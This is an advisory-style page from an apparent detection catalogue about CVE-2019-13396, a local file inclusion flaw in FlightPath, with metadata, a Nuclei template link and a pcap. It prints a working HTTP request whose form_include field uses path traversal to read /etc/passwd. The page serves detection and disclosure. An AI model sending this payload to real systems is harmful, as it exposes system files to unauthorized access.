🔙 목록으로 돌아가기

CVE-2019-13396: FlightPath - Local File Inclusion

TitleFlightPath - Local File Inclusion
Author0x_Akoko,daffainfo
SeverityMedium
ImpactThis vulnerability can lead to unauthorized access, data leakage, and remote code execution.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score5.3
EPSS Score0.66535
CVE IDCVE-2019-13396
CWE IDCWE-22
Tags cve cve2019 flightpath lfi edb getflightpath vuln

🔍 Vulnerability Description

FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.

🌐 HTTP Request

GET /login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.4
Connection: close
Accept-Encoding: gzip
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 95
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

callback=system_login_form&form_token=cjo9jk&form_include=../../../../../../../../../etc/passwd

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-13396.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-13396.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A